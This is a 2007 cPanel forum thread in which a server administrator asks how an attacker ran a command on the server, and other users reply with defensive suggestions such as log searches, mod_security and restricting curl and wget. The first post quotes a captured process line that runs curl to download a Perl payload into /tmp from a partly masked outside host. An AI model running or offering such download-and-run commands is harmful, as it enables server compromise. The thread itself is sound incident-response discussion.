The Community Forums

Interact with an entire community of cPanel & WHM users.
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Identifying Point of Entry

Discussion in 'General Discussion' started by glansing, Apr 4, 2007.

  1. glansing

    glansing Active Member

    Joined:
    Jun 3, 2003
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    6
    Hello,

    I'm trying to figure out how a hacker managed to get the following to execute.

    Code:
    31768 ?        S      0:00 sh -c cd /tmp;curl -O http://****.gov.br/maico.perl;ls
    31769 ?        S      0:01 curl -O http://*****.gov.br/maico.perl
    
    Now, I had curl chmoded to 0700 (owned by root) and when I went to check, it was 0755 -- I'm assuming it was overwritten during an automatic update. It's back at 0700 -- but I'd still like to figure out where the point of entry was.

    I can't find anything referring to anything above in the apache logs; my assumption is it is an insecure script -- the dest ip was that of one of my resellers. This reseller has a number of clients with CMS systems.

    Any thoughts on what might be the actual point of entry? I'd appreciate any thoughts/suggestions of places to examine.

    Thank you.
     
  2. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    I can give you a free WHM addon that scans various tmp partitions for malicious files with reports, just contact me by PM.

    Finding how the file got there, you'll need to do various greps of the domlogs from users accounts for particular string matches. I also highly recommend you add mod_security to your server as well. Also disable your common files such as wget from regular users from accessing it.
     
  3. glansing

    glansing Active Member

    Joined:
    Jun 3, 2003
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    6
    Rampage,

    I had locked everything down -- curl, wget, etc. But curl was somehow chmoded back to 0755.

    I installed mod_security a long time ago; it's working, configured and blocking.

    I've searched domlogs for various patterns, parts of the string encoded in different ways, and I can't find anything there.
     
Loading...

Share This Page